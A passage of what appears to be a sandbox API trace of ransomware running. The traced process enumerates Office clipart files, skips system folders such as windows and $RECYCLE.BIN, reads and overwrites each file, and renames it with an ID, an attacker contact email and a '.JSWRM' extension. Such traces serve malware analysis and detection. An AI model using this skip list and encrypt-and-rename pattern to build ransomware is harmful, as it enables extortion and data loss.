lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0092.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0092.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0092.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0092.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.677] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0092.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.678] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e58, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_06.MID", cAlternateFileName="")) returned 1 [0092.678] lstrcmpiW (lpString1="PARNT_06.MID", lpString2=".") returned 1 [0092.678] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="..") returned 1 [0092.678] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="...") returned 1 [0092.678] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="windows") returned -1 [0092.678] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="recovery") returned -1 [0092.678] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="perflogs") returned -1 [0092.679] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="documents and settings") returned 1 [0092.679] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.679] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="system volume information") returned -1 [0092.679] lstrcmpiW (lpString1="PARNT_06.MID", lpString2="msocache") returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_06.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_06.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_06.MID", lpUsedDefaultChar=0x0) returned 12 [0092.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_06.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_06.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_06.MID", lpUsedDefaultChar=0x0) returned 12 [0092.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.679] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7768) returned 1 [0092.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e50) returned 0x205850 [0092.679] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e50, lpOverlapped=0x0) returned 1 [0092.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.681] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e50, lpOverlapped=0x0) returned 1 [0092.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.682] CloseHandle (hObject=0x314) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0092.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0092.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0092.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0092.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.683] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_07.MID", cAlternateFileName="")) returned 1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2=".") returned 1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="..") returned 1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="...") returned 1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="windows") returned -1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="recovery") returned -1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="perflogs") returned -1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="documents and settings") returned 1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="system volume information") returned -1 [0092.683] lstrcmpiW (lpString1="PARNT_07.MID", lpString2="msocache") returned 1 [0092.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_07.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_07.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_07.MID", lpUsedDefaultChar=0x0) returned 12 [0092.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_07.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_07.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_07.MID", lpUsedDefaultChar=0x0) returned 12 [0092.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.684] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6564) returned 1 [0092.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19a0) returned 0x205850 [0092.684] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x19a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x19a0, lpOverlapped=0x0) returned 1 [0092.690] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.690] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x19a0, lpOverlapped=0x0) returned 1 [0092.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.690] CloseHandle (hObject=0x314) returned 1 [0092.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0092.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0092.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0092.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.690] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0092.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.691] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cb3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_08.MID", cAlternateFileName="")) returned 1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2=".") returned 1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="..") returned 1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="...") returned 1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="windows") returned -1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="recovery") returned -1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="perflogs") returned -1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="documents and settings") returned 1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="system volume information") returned -1 [0092.691] lstrcmpiW (lpString1="PARNT_08.MID", lpString2="msocache") returned 1 [0092.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_08.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_08.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_08.MID", lpUsedDefaultChar=0x0) returned 12 [0092.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_08.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_08.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_08.MID", lpUsedDefaultChar=0x0) returned 12 [0092.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.692] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7347) returned 1 [0092.692] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cb0) returned 0x205850 [0092.692] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1cb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1cb0, lpOverlapped=0x0) returned 1 [0092.694] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.694] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1cb0, lpOverlapped=0x0) returned 1 [0092.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.694] CloseHandle (hObject=0x314) returned 1 [0092.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0092.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0092.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0092.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.695] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0092.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.695] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_09.MID", cAlternateFileName="")) returned 1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2=".") returned 1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", 